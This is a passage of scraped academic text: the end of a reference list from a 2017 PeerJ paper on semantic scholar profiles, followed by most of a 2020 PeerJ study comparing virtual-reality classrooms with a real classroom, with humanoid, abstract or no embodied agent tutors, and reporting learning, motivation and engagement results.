Harmelen F, Menken M, Mika P, Plechawski M, Pyszlak P, Siebes R, Staab S, Tempich C. 2006. Bibster—a semantics-based bibliographic peer-to-peer system. Berlin, Heidelberg: Springer, 349–363. Heath T, Bizer C. 2011. Linked data: evolving the web into a global data space. In: Synthesis lectures on the semantic web: theory and technology. San Rafael: Morgan & Claypool Publishers. Heckmann D, Schwartz T, Brandherm B, Schmitz M, Von Wilamowitz-Moellendorff M. 2005. Gumo—the general user model ontology. In: User modeling 2005. Lecture notes in computer science, vol. 3538. Berlin: Springer, 428–432. HR-XML-Consortium. 2004. Competencies (Measurable Characteristics). Available at http://www.ec.tuwien.ac.at/~dorn/Courses/KM/Resources/hrxml/HR-XML- 2_3/CPO/Competencies.html. Järvelin K, Kekäläinen J. 2002. Cumulated gain-based evaluation of IR techniques. ACM Trans. Inf. Syst. 20(4):422–446 DOI 10.1145/582415.582418. Jovanovic J, Siadaty M, Gasevic D, Milikic N. 2011. IntelLEO competences ontology. Available at http://www.intelleo.eu/ontologies/competences/spec/ . Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 37/39 https://peerj.com http://dx.doi.org/10.1108/09685220610648373 http://www.ec.tuwien.ac.at/~dorn/Courses/KM/Resources/hrxml/HR-XML-2_3/CPO/Competencies.html http://www.ec.tuwien.ac.at/~dorn/Courses/KM/Resources/hrxml/HR-XML-2_3/CPO/Competencies.html http://dx.doi.org/10.1145/582415.582418 http://www.intelleo.eu/ontologies/competences/spec/ http://dx.doi.org/10.7717/peerj-cs.121 Kobsa A. 2001. Generic user modeling systems. User Modeling and User-Adapted Interaction 11(1–2):49–63 DOI 10.1023/A:1011187500863. Kyriacou D, Davis HC, Tiropanis T. 2009. A (multi’domain’sional) scrutable user modelling infrastructure for enriching lifelong user modelling. In: Lifelong user modelling workshop (in conjunction with conference UMAP 2009). Trento,. Letierce J, Passant A, Decker J, Breslin G. 2010. Understanding how Twitter is used to spread scientific messages. In: Web science conf. Raleigh. Likert R. 1932. A technique for the measurement of attitudes. Archives of Psychology 22(140):1–55. Manning CD, Raghavan P, Schütze H. 2008. Introduction to information retrieval. Cambridge: Cambridge University Press. Mendes PN, Jakob M, García-Silva A, Bizer C. 2011. DBpedia spotlight: shedding light on the web of documents. In: Proceedings of the 7th international conference on semantic systems. ACM, 1–8. Nishioka C, Scherp A. 2016. Profiling vs. time vs. content: what does matter for top-k publication recommendation based on twitter profiles? In: Proceedings of the 16th ACM/IEEE-CS on Joint conference on digital libraries, JCDL ’16. New York: ACM, 171–180 DOI 10.1145/2910896.2910898. NIST. 2009. Text retrieval conference (TREC): enterprise track. Available at http://trec. nist.gov/data/enterprise.html. Orlandi F, Breslin J, Passant A. 2012. Aggregated, interoperable and multi-domain user profiles for the social web. In: Proceedings of the 8th international conference on semantic systems (I-SEMANTICS ’12). New York: ACM, 41–48. Paquette G. 2003. Instructional engineering for network-based learning. Available at http://www-clips.imag.fr/calie04/actes/Paquette.pdf . Paquette G. 2007. An ontology and a software framework for competency modeling and management. Educational Technology & Society 10(3):1–21. Raad E, Chbeir R, Dipanda A. 2010. User profile matching in social networks. In: The 13th international conference on network-based information system. Sampson D, Fytros D. 2008. Competence models in technology-enhanced competence- based learning. In: Adelsberger HH, Kinshuk, Pawlowski JM, Sampson DG, eds. Handbook on information technologies for education and training. Berlin, Heidelberg: Springer, 155–177. Sandberg R. 2000. Competence—the basis for a smart workforce. In: Gerber R, Lanks- hear C, eds. Training for a smart workforce. London: Routledge. Sateli B, Löffler F, König-Ries B, Witte R. 2016. Semantic user profiles: learning scholars’ competences by analyzing their publications. In: Semantics, analytics, visualisation: enhancing scholarly data (SAVE-SD 2016). Springer. Sateli B, Witte R. 2015. Semantic representation of scientific literature: bringing claims, contributions and named entities onto the Linked Open Data cloud. PeerJ Computer Science 1(e37): DOI 10.7717/peerj-cs.37. Schmidt A, Kunzmann C. 2006. Towards a human resource development ontology for combining competence management and technology-enhanced workplace learning. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 38/39 https://peerj.com http://dx.doi.org/10.1023/A:1011187500863 http://dx.doi.org/10.1145/2910896.2910898 http://trec.nist.gov/data/enterprise.html http://trec.nist.gov/data/enterprise.html http://www-clips.imag.fr/calie04/actes/Paquette.pdf http://dx.doi.org/10.7717/peerj-cs.37 http://dx.doi.org/10.7717/peerj-cs.121 In: Proceedings of the 2006 international conference on on the move to meaningful internet systems: AWeSOMe, CAMS, COMINF, IS, KSinBIT, MIOS-CIAO, MONET– Volume Part II, OTM’06. Berlin: Springer-Verlag, 1078–1087 DOI 10.1007/11915072_10. Shadbolt N, Hall W, Berners-Lee T. 2006. The semantic web revisited. Intelligent Systems, IEEE 21(3):96–101 DOI 10.1109/MIS.2006.62. Shotton D. 2009. Semantic publishing: the coming revolution in scientific journal publishing. Learned Publishing 22(2):85–94 DOI 10.1087/2009202. Sicilia M-A. 2005. Intelligent learning infrastructure for knowledge intensive organiza- tions: a semantic web perspective. In: Chapter ontology-based competency manage- ment: infrastructures for the knowledge intensive learning organization. Hershey: Idea Group, 302–324. Sieg A, Mobasher B, Burke R. 2007. Web search personalization with ontological user profiles. In: Proceedings of the 16th ACM conference on conference on information and knowledge management, (CIKM ’07). New York: ACM, 525–534. Sitthisak O, Gilbert L, Davis HC. 2009. Transforming a competency model to pa- rameterised questions in assessment. In: Cordeiro J, Hammoudi S, Filipe J, eds. Web information systems and technologies: 4th international conference, WEBIST 2008, Funchal, Madeira, Portugal, May 4-7, 2008, Revised selected papers. Berlin, Heidelberg: Springer, 390–403 DOI 10.1007/978-3-642-01344-7_29. Stankovic M, Rowe M, Laublet P. 2012. Finding co-solvers on twitter, with a lit- tle help from linked data. In: Proceedings of the 9th international conference on the semantic web: research and applications. Berlin: Springer-Verlag, 39–55 DOI 10.1007/978-3-642-30284-8_10. Szomszor M, Alani H, Cantador I, O’Hara K, Shadbolt N. 2008. Semantic modelling of user interests based on cross-folksonomy analysis. In: Proceedings of the 7th international conference on the semantic web, ISWC ’08. Berlin, Heidelberg: Springer- Verlag, 632–648 DOI 10.1007/978-3-540-88564-1_40. Tang J, Yao L, Zhang D, Zhang J. 2010. A combination approach to web user profiling. ACM Transactions on Knowledge Discovery from Data (TKDD) 5(1):2:1–2:44 DOI 10.1145/1870096.1870098. Teodorescu T. 2006. Competence versus competency: what is the difference? Performance Improvement 45(10):27–30. Zukerman I, Litman D. 2001. Natural language processing and user modeling: synergies and limitations. User Modeling and User-Adapted Interaction 11(1–2):129–158 DOI 10.1023/A:1011174108613. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 39/39 https://peerj.com http://dx.doi.org/10.1007/11915072_10 http://dx.doi.org/10.1109/MIS.2006.62 http://dx.doi.org/10.1087/2009202 http://dx.doi.org/10.1007/978-3-642-01344-7_29 http://dx.doi.org/10.1007/978-3-642-30284-8_10 http://dx.doi.org/10.1007/978-3-540-88564-1_40 http://dx.doi.org/10.1145/1870096.1870098 http://dx.doi.org/10.1023/A:1011174108613 http://dx.doi.org/10.7717/peerj-cs.121 work_veftzkgr2rcptpywfzizjh2lli ---- Immersive virtual environments and embodied agents for e-learning applications Immersive virtual environments and embodied agents for e-learning applications Isabel S. Fitton1, Daniel J. Finnegan2 and Michael J. Proulx3 1 Department of Computer Science, University of Bath, Bath, UK 2 School of Computer Science & Informatics, Cardiff University, Cardiff, UK 3 Department of Psychology, University of Bath, Bath, UK ABSTRACT Massive Open Online Courses are a dominant force in remote-learning yet suffer from persisting problems stemming from lack of commitment and low completion rates. In this initial study we investigate how the use of immersive virtual environments for Power-Point based informational learning may benefit learners and mimic traditional lectures successfully. We examine the role of embodied agent tutors which are frequently implemented within virtual learning environments. We find similar performance on a bespoke knowledge test and metrics for motivation, satisfaction, and engagement by learners in both real and virtual environments, regardless of embodied agent tutor presence. Our results raise questions regarding the viability of using virtual environments for remote-learning paradigms, and we emphasise the need for further investigation to inform the design of effective remote-learning applications. Subjects Human-Computer Interaction, Computer Education Keywords Virtual reality, Distance learning, MOOC, Classroom, Immersive virtual environments, E-learning, Education INTRODUCTION Technological advancements have played a vital role in accommodating vast numbers of students through the growth of distance learning applications and e-learning platforms (Kaplan & Haenlein, 2016; Kauffman, 2015). The predominant form of distance learning applications are Massive Open Online Courses (MOOCs). MOOCs offer access to teaching and material on a large scale via internet-based virtual learning environments for a limitless number of participants, making education more accessible (Freitas & Paredes, 2018). Modern MOOCs involve a video captured recording of a human lecturer who delivers the learning content, facilitating the completion of homework or exams, and discussion via forums (Feng et al., 2015). However, despite the potential of MOOCs to deliver teaching materials and content at a global scale, existing platforms suffer from issues with drop-out and learner motivation (Yang et al., 2013). In parallel to e-learning platforms gaining popularity (Sneddon et al., 2018), VR technology has increasingly been adopted in the classroom as a teaching aid for ‘hands-on’ skills-based teaching partly due to reductions in cost. For example in medicine, digital models are much cheaper compared to physical anatomical models for training students (Rajeswaran et al., 2018). Using digital models in a virtual reality scenario is a cost-effective way to educate students How to cite this article Fitton IS, Finnegan DJ, Proulx MJ. 2020. Immersive virtual environments and embodied agents for e-learning applications. PeerJ Comput. Sci. 6:e315 DOI 10.7717/peerj-cs.315 Submitted 16 April 2020 Accepted 19 October 2020 Published 16 November 2020 Corresponding author Isabel S. Fitton, isf21@bath.ac.uk Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.315 Copyright 2020 Fitton et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.315 mailto:isf21@�bath.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.315 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ on a large scale and as a result there is growing excitement regarding the potential of VR to revolutionise education and e-learning (Greenwald et al., 2017). While VR is regarded as beneficial to students as a practical teaching aid, its application to formal, lecture style teaching—which e-learning platforms tend to deliver—is less common (Korallo, 2010). The use of Immersive Virtual Environments (IVEs) for corporate and higher-education purposes have only recently begun to emerge. Due to such applications being in their infancy there is very little empirical evaluation of their efficacy or research available to inform their design. A key component of many IVEs is the presence of an Embodied Agent (EA) which, in the context of learning, may serve as a virtual guide or tutor. The use of EAs as virtual tutors within educational IVEs is critical for effective pedagogy (Soliman & Guetl, 2010). Previous research suggests that the representation of artificial agents affects learners’ motivation (Maldonado & Nass, 2007). For example an EA may be customised by the learner to suit their preference—such customisation has been shown to improve performance for some cognitive tasks (Lin et al., 2017). In another study that tested male vs. female pedagogical agents, the female seemed to be preferred overall (Novick et al., 2019). A recent systematic review of pedagogical agents noted that positive results have been found in numerous studies, yet different combinations of features and different outcome variables have not been systematically studied to clarify which features work best or when (Martha & Santoso, 2019). However, it is unclear how the presence of an EA and learner motivation interact. A clear and robust analysis of these factors and their impact on the learning experience is critical for future application of IVEs as engaging platforms for distance learning. Furthermore, the recent novel SARS-COV-2 (COVID-19) pandemic has had huge repercussions for higher education across the world. As millions of people were restricted to not leaving their homes for extended periods of time, many institutions also shifted to remote delivery of learning material for the academic year 2020/21. Although this presents challenges around blended learning and flipped classroom design, our focus remains on technology and how it may act as a medium for learning material delivery as opposed to what content such material should contain. Our main contribution in this work is an empirical investigation into factors which impact the overall student experience when learning in IVEs. Specifically we report how the presence of an embodied teacher and students’ sense of presence in the environment impact learning retention, satisfaction and engagement, and student motivation to engage with learning material presented in an IVE. Our results demonstrate how learning in IVEs is comparable to real classroom learning, yet can scale far beyond the limits of traditional classrooms with constraints such as staff-student ratio and classroom size. Finally, we emphasise implications for future work in designing and assessing IVEs for remote learning purposes. Background As distance learning continues to expand, catering for larger numbers of students across the globe, current solutions provide inefficient delivery systems which are not immersive, engaging, or motivating to the learner—often resulting in poor rates of completion Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 2/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ (Wise et al., 2004; Yang et al., 2013; Chen, 2018). For example an investigation into the use of ‘Accountable Talk: Conversation that Works’, a MOOC provided by the University of Pittsburgh, revealed that despite in excess of 60,000 students registering for the programme less than half continued to access the course material through to completion (Rosé et al., 2014). Attrition rates of learners in MOOCs is much higher than that in formal education (Clow, 2013; Joo, So & Kim, 2018). Users also report that they do not perceive MOOCs as equivalent to traditional education, and their engagement with them is less serious (Nemer & O’Neill, 2019). As a result, MOOCs are unable to deliver educational experiences with the same rigour as formal educational institutions. While MOOCs have several short-comings, the ability to study without being physically located in a certain space has many advantages to both students unable to attend and universities who are coping with growing numbers of students. Therefore, finding ways to improve the experience of distance learning and encouraging greater levels of engagement with online courses is of great public interest and their efficacy in education is of equal pedagogic interest. Bringing learners into IVEs may overcome engagement issues experienced in MOOCs. Students prefer to engage in traditional lectures over online courses because they lack self-discipline and they can become too easily distracted during online learning (Crook & Schofield, 2017). Applying immersive VR to education may engage students better than MOOCs, removing distractions outside of the learning environment, mimicking the experience of traditional learning experiences (Lessick & Kraft, 2017; Pirker et al., 2018). Existing examples of educational applications of VR have focused on non immersive desktop-VR and have shown that simulating learning environments is highly effective. For example desktop-VR has been successfully used for social cognition training in children with Autism Spectrum Disorders and for assessing procedural skills such as dissecting frogs in a laboratory study (Didehbani et al., 2016; Merchant et al., 2014). IVE based learning environments have shown that learning using VR results in better retention and improves learners’ performance by up to a grade compared to simply watching a lecture or reading (Sitzmann, 2011; Graesser et al., 2005). While educational applications of desktop-VR have merit, research suggests IVEs lead to better results as interaction with the environment is more intuitive, therefore users spend less time learning how to use the computer interface and can focus their full attention on the task (Psotka, 1995). To date, IVEs have been predominantly applied to procedural and skills-based education, successfully enhancing learning outcomes. For example the performance of a group of material science students on a series of questions about crystal structures improved when they were presented with virtual 3D diagrams of crystal structures via a head-mounted display (HMD), compared to using 2D diagrams (Caro et al., 2018). The ability to manipulate and rotate the crystals in the IVE helped students understand the relationships between atoms and perform better in assessment tasks than those who studied the textbook diagrams. Additionally, students reported that the IVE was easy to use and preferable over the 2D format. IVEs are also commonly used successfully to train complex psychomotor skills required by medical students. For example AirwayVR provides a safe, immersive environment to practice Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 3/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ endotracheal intubation procedures, leading to clear improvements in students’ self-reported understanding of the procedure compared to their knowledge prior to using the application (Rajeswaran et al., 2018). Recent research suggests applying IVEs to lecture-styled learning may provide distance learners with enriched learning experiences that are more immersive, enjoyable, and realistic (Chen, 2018). Preliminary research has shown the value in using IVEs to replicate classroom learning, finding that students perform better on a quiz about the topic after watching a virtual lecture compared to watching a video recording of a lecture, as is typically done in MOOCs (Tsaramirsis et al., 2016). Additionally, all learners reported that they preferred the IVE as it was more enjoyable, reinforcing the idea that IVEs are likely to successfully engage a larger number of distance learners than MOOC platforms. However, while educational applications of IVEs for distance learning in both higher education and corporate level training have begun to emerge, these applications are in their infancy. Recent work has explored the use of modern game development engines and HMD based environments for creating virtual lecture theatres and classrooms (Misbhauddin, 2018), but has not explored how effective these environments are at improving learner performance, motivation, and satisfaction & engagement. As such, to the best of our knowledge there are currently no published findings regarding their effectiveness, resulting in very little robust evidence to inform how the design of an IVE impacts learning outcomes (Moro, Stromberga & Stirling, 2017). When designing IVEs, one does not consider just the aesthetic, but also the presence of other agents inside the environment. Within IVEs, embodied agents (EAs) are frequently used as pedagogical agents for virtual tutoring. For example STEVE is a human-like EA used to teach engineers how to use complex machinery onboard ships (Johnson & Rickel, 1997). In addition to humanoid EAs there are non-human examples such as Herman the bug—a non-humanoid EA implemented in Design-A-Plant, a virtual environment used to teach children about plant biology and the environment (Lester, Stone & Stelling, 1999). The appearance and behaviour of EA tutors influences learners’ feelings of co-presence (Baylor, 2011; Baylor & Kim, 2009)—the perception that one is not alone but in the presence of others (Heeter, 1992; Short, Williams & Christie, 1976). Co-presence increases when an EA tutor has appearance and behavioural realism—a key point being that there is no mismatch between appearance and behavioural realism, as this results in very low levels of perceived co-presence (Bailenson et al., 2005). Increasing a learner’s perceived co-presence increases learner satisfaction and motivation to engage with material. For example it has been shown that learners spend approximately 25% more time learning and report that the learning experience is more enjoyable when an EA is present (Sträfling et al., 2010). A limitation of current distance learning platforms, such as MOOCs, is that learners must try to maintain enthusiasm and motivation to complete the course in the absence of an educator (Hasegawa, Uğurlu & Sakuta, 2014). Implementing an appropriate EA which represents a lecturer within an IVE may maintain learner interest and motivation, positively impacting learning outcomes. The appearance of the virtual tutor impacts a learner’s perception Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 4/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ of the tutor’s abilities. For example human-like agents are perceived as more intelligent and helpful compared to non-human agents (King & Ohya, 1996; Lester & Stone, 1997), while familiar agents are rated more positively than unfamiliar agents (Bailenson et al., 2005). Previous research has demonstrated that virtual tutor realism influences learners’ reported likability and motivation (Maldonado & Nass, 2007), in turn influencing performance. Thus, we expect that a realistic EA tutor which is familiar to the learner will be more likeable, improving the learning experience and motivation to learn (Maldonado & Nass, 2007; Scaife & Rogers, 2001). While some evidence suggests that EAs play a substantial role in the learning experience, increasing learning efficiency and retention (Roussou, Oliver & Slater, 2006), others have found minimal-to-no effect of EAs on learning outcomes. For example in one study EAs were found to have no influence and prior knowledge was identified as the greatest contributing factor to learner performance (Sträfling et al., 2010). Therefore, to clearly establish the utility of EAs within IVEs researchers should aim to control this potentially extraneous variable to prevent participants’ prior knowledge of the topic concealing any effects of the EA. Overall, IVEs for educational purposes have the potential to mimic traditional learning experiences greater than MOOCs. By utilising IVEs to develop more engaging distance learning experiences, universities and corporate training bodies may cater for increasing student numbers. However, a major barrier to implementing IVEs compared to MOOCs is the higher relative cost of the equipment required. Therefore, it is essential that interdisciplinary research is conducted to establish whether IVEs, which can be run on low powered hardware such as smartphones, are able to provide a method of engaging more students, provide remote-learners with an experience which is more equivalent to formal education, and make a worthwhile contribution to higher education institutions looking to provide effective distance learning. User study Our study focuses on the educational applications of IVEs, specifically investigating the effectiveness of learning novel information in an IVE compared to a physical classroom, and the role of EAs as tutors within the IVEs. We devised the following hypotheses: H1: Participants who learn inside an IVE will learn more effectively and outperform participants who learn in a physical classroom since prior research has shown that virtual learning environments result in better retention and improves performance (Sitzmann, 2011; Graesser et al., 2005). H2: Participants who learn in the presence of an EA tutor will outperform participants who learn without one because the presence of a virtual tutor influences motivation which may in turn influence performance (Sträfling et al., 2010). H3: The presence of a humanoid EA tutor will be more likable and increase motivation in learners compared to an abstract EA tutor because more familiar and realistic tutors are more likeable and motivating (Bailenson et al., 2005; Maldonado & Nass, 2007). Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 5/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ MATERIALS AND METHODS A between-participant design was used, whereby participants were randomly assigned to one of the four learning conditions. The independent variable was the learning environment (IVE with no tutor, IVE with a humanoid tutor, IVE with an abstract tutor, Non-virtual learning environment). The dependent variables were performance (test score), and reported motivation, satisfaction, and engagement (questionnaire). The experiment lasted approximately 45∼60 min. Design and apparatus Opportunity sampling was used to recruit participants from a local university. The target sample size for this initial study was 48 participants, split equally between the four learning conditions, based on the results of an a-priori power analysis, conducted using G*Power 3 (Faul et al., 2007), revealing a one-way ANOVA with 12 participants per group would provide 80% power to detect an effect size of 0.5 at a significance level of 0.05. Note that we instead used a more conservative Kruskal–Wallis test rather than the ANOVA to evaluate the results; prior work has shown that Kruskal–Wallis has greater statistical power than ANOVA under these conditions, so the analyses presented were indeed sufficiently powered (Hecke, 2012). In total, 48 participants were recruited (24 M, 24 F), aged 18 and over (M = 20.8 years, SD = 3.3 years). All participants were students from a variety of disciplines who reported normal or corrected to normal vision and hearing. Participants were incentivized through course credit (n = 8), £5 reward (n = 22), or simply volunteered to participate (n = 18). Statistical tests confirmed that there was no significant effect of the type of incentive received on participant performance (See Supplemental Material). A machine running Windows 10 with a single Nvidia 970 GPU was adequate to drive the virtual environment since it is without cutting-edge graphics. To display the virtual environment, we used the HTC Vive HMD. This HMD covers a 110 degrees field of view, with two 1,080 × 1,200 pixel screens to render stereoscopic graphics to the viewer. Head position and orientation were tracked using the hardware base stations packaged with the HMD. However, the environment can also be demoed as a mobile application and we expect that in a larger cohort the set up could be easily scaled up using more consumer-friendly devices such as Smartphones and Google cardboards. Learning environments & material A seminar room on a local university campus was used as the non-virtual learning environment (See Fig. 1). A PowerPoint presentation was projected onto the screen to display the learning material and the female experimenter represented the tutor, reading a script alongside each slide (See Supplemental Materials). A virtual replica of the physical classroom, made to scale in order to minimise the number of extraneous variables (Fig. 1C) was created using Unity 2018.2.17. To replicate the appearance, colours and textures were applied and generic classroom furniture were used to decorate the virtual environment. To display the PowerPoint slides in the IVEs, custom software applied images of the PowerPoint slides as textures to the virtual projector Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 6/22 http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ screen. The lecture slide changed to the next one in sequence when spacebar was pressed. Audio recordings of the female experimenter reading the script were automatically played with each slide to keep delivery of the lecture material consistent for all participants. For the IVE with a humanoid tutor, a female avatar was created using AdobeFuse CC Beta and imported into the environment (Fig. 1A). The female avatar has an animator controller to loop an ‘idle’ and an ‘eye blink’ motion to appear more realistic. For the IVE with an abstract tutor, a block-shape representation was created from geometrically primitive shapes (Fig. 1B). The abstract tutor was animated using key frame animation which moved the body side-to-side and rotated the eyes to replicate the humanoid ‘idle’ and ‘blink’ motions. Novel information was created for this study about the developmental stages of a made-up alien species. This was used as the learning material in order to eliminate the possibility of prior knowledge becoming a confounding variable (See Supplemental Material). Questionnaire All data were recorded using Qualtrics, a web browser interface that automatically recorded responses from participants. The first section of the questionnaire contained the knowledge test, composed of 29 questions designed to test participants’ knowledge of the alien species. The majority of the questions were multiple choice in order to test retention, with some short answer questions to test comprehension (Schrader & Bastiaens, 2012) (See Supplemental Material). However, multiple choice tests have been critiqued as they ‘feed’ students the answers, making it possible to gain artificially high scores (Bush, 2001). Therefore to accurately reflect retention, the test was negatively marked (meaning correct answers were given a score of 1, incorrect answers scored −1, and any Figure 1 The humanoid embodied agent tutor (A), the non-human tutor (B), a view of the entire virtual classroom environment (C), a view from the perspective of participants in our experiment showing the novel learning material (D), and a view of the real world classroom (E). Participants sat in the same position in both real and virtual environments as shown by the red circles. Full-size DOI: 10.7717/peerj-cs.315/fig-1 Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 7/22 http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315/fig-1 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ unanswered questions scored 0) to discourage guessing (Davies, 2002). The test was marked to produce a score to indicate participant performance. Three blocks of questions followed: learner satisfaction and engagement (7 items); learner motivation (3 items); and virtual presence (5 items; see Supplemental Materials for the questionnaire). Learner satisfaction and engagement The questions designed to measure satisfaction and engagement with the learning experience were 5-point Likert scales which asked participants how strongly they agreed or disagreed with the statements. For example “The learning experience captured my interest”. Each item was scored out of five (5 = Strongly Agree) and added together to produce a learner satisfaction and engagement score out of 35. The questions were created for the purpose of this experiment as it aimed to measure specifically how engaged ‘students’ were in this one experience. We had considered using an existing student satisfaction questionnaire but opted to develop our own so that questions could be focused on the experience in our study. Learner motivation Another block of questions was specifically tailored to investigate the effects of the EA tutor manipulation on learner motivation, for example “The presence of the tutor increased my motivation to learn”. Each item included a 5-point Likert scale which asked participants to what extent they agreed with each statement, with ‘Strongly Agree’ being scored as five. The item scores were added together to produce a learner motivation score out of 15. Virtual presence The virtual presence questions were taken from an existing questionnaire (Witmer & Singer, 1998). The most applicable items were selected, for example “To what degree did your experiences in the virtual environment seem consistent with your real-world experiences?”, participants responded to each statement via a 5-point scale (1 = Not at all, 5 = Completely) to indicate how immersive the IVEs were, and this produced a virtual presence score out of 25. Finally, to measure any potentially confounding effects, participants in the IVE with a humanoid tutor were asked to report anything they found ‘odd’ about the human avatar, as a perceived mismatch between appearance and expected behaviour, for example ‘speaking’ with no changing facial expression or lip movement, could lead to disliking of the tutor and affect performance (Mori, 1970; Bailenson et al., 2005). Procedure This study was approved by the University of Bath Psychology Research Ethics Committee (17-292). Participants were provided with further information about the study before giving written informed consent. Only one participant took part in the experiment at a time. Each participant was randomly allocated to one of the four learning conditions. Participants in the IVEs were seated at a computer in the laboratory, the experimenter would assist with fitting the headset and headphones to ensure the participant was Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 8/22 http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ comfortable. The experimenter would then launch the appropriate classroom application (i.e. with a humanoid/abstract/no tutor). Participants allocated to the non-virtual condition were seated in a seminar room on the university campus. Participants in the non-virtual condition took part in the experiment individually: the only other person present in the room was the experimenter. In both virtual and non-virtual conditions participants were shown the same PowerPoint presentation, and heard the same experimenter deliver the scripted information. The only difference being that in the virtual condition the voice-clips were pre-recorded and incorporated into the environment, whereas in the non-virtual condition the experimenter delivered the information in person. In all conditions, participants observed the full presentation with corresponding audio once, and were then allowed the remaining time to read through the slides themselves with no audio input. After 30-minutes the experimenter halted the learning part of the experiment, and those in the IVEs would be asked to remove the headset. All participants were then required to complete the online test and questionnaire. Throughout the experiment, all participants remained naïve to the manipulation of the tutor and the environment. Afterwards all participants were fully debriefed, and the full aims of the study were revealed, participants then provided final consent for the data to be used. ANALYSIS AND RESULTS Frequentist null hypothesis significance testing and the associated p-value has many shortcomings, for example it relies on hypothetical data and can be easily manipulated— with larger sample sizes able to make small differences significant without any practical value (Jarosz & Wiley, 2014; Dienes, 2011). Bayes Factor (BF) is a ratio which indicates the likelihood of the observed data fitting under either of the two hypotheses. Therefore, Bayesian statistics were conducted using JASP version 0.9 to determine the relative strength of the support for the null vs. alternative hypotheses. BF represents the likelihood that the evidence is explained by one hypothesis over another, for example a BF of 20 would indicate that one hypothesis is 20 times more likely to explain the data. BF can be given as BF10 (evidence for the alternative hypothesis) or BF01 (evidence for the null hypothesis) (Schut et al., 2018). We used BF01 values as they are easier to interpret in relation to our findings. Based on this interpretation scheme, BF01 values of 3–10 indicate moderate support for the null hypothesis, while values <3 indicate weak support for the null hypothesis (Wagenmakers et al., 2018). Tables 1 and 2 presents a summary of these results. Additional statistical analyses carried out using SPSS version 24.0 were evaluated against an alpha level of 0.05. An independent t-test was used to determine differences in learner motivation between the humanoid tutor IVE and the abstract tutor IVE. Assumption checking revealed that the data were normally distributed as assessed by the Shapiro–Wilk test (p > 0.05), and the variance in each group was approximately equal, as assessed by Levene’s test for homogeneity of variances (p > 0.05). However, due to the small sample size three Kruskal–Wallis tests were conducted to compare learner performance, satisfaction and engagement, and virtual presence ratings across multiple Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 9/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ learning conditions. Preliminary analyses confirmed that the data met the test assumptions as there were no extreme outliers, and there was homogeneity of variances. Learner performance Mean scores for learner performance in each learning conditions are shown in Fig. 2. On average, learner performance was similar across all learning environments, with only Table 2 t-test results for the impact of tutor on motivation to learn. Abstract tutor Humanoid tutor Measure M SD M SD t(22) p d Motivation 10 2.2 8.8 2.1 −1.316 0.202 −0.537 Figure 2 Mean test scores in the different learning environments. Error bars represent the standard error (SE). Dots show distribution of participant scores, with larger dots indicating multiple participants with the same score. Full-size DOI: 10.7717/peerj-cs.315/fig-2 Table 1 Kruskal–Wallis results summary covering the three core variables in our study: learner performance, satisfaction & engagement, and sense of presence. Non-virtual Virtual, no tutor Virtual, humanoid tutor Virtual, abstract tutor H(3) p η2 Measure M SD M SD M SD M SD Performance 30.75 11.67 28.92 10.22 28.33 9.20 26.33 8.17 2.806 0.422 0.06 no tutor humanoid tutor abstract tutor H(2) p η2 M SD M SD M SD Satisfaction & Engagement 27.42 5.35 25.75 5.91 25.67 5.77 2.954 0.399 0.063 Presence 14.42 2.27 14.67 2.46 14.42 2.39 0.066 0.968 0.001 Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 10/22 http://dx.doi.org/10.7717/peerj-cs.315/fig-2 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ slight differences among conditions. With respect to H1 and H2, we conducted a Kruskal– Wallis test and results report no statistically significant differences in performance scores between conditions, H(3) = 2.806, p = 0.422, η2 = 0.06, this result is moderately reinforced by the Bayes statistics which indicate that the data are six times more likely to be explained by the null hypothesis (BF01 = 6.2). Learner satisfaction and engagement Mean scores for learner satisfaction and engagement in each virtual learning condition are shown in Fig. 3. Learner satisfaction and engagement levels, as measured by seven items in the questionnaire (Cronbach a = 0.84), were similar across all virtual learning conditions, with only slightly higher levels measured in the IVE with no tutor. A Kruskal–Wallis test supported that learner satisfaction and engagement levels were not significantly different between the virtual learning conditions, H(3) = 2.954, p = 0.399, η2 = 0.063 Furthermore, Bayes statistics indicate that the data are four times more likely to be explained by the null hypothesis (BF01 = 4.1). Learner motivation Mean scores for learner motivation in the presence of humanoid and non-humanoid EAs are shown in Fig. 4. Learner motivation scores, measured using three items in the questionnaire (Cronbach a = 0.62), appeared higher in the IVE with the abstract tutor (M = 10.0, SD = 2.2) compared to learner motivation scores in the IVE with the humanoid tutor (M = 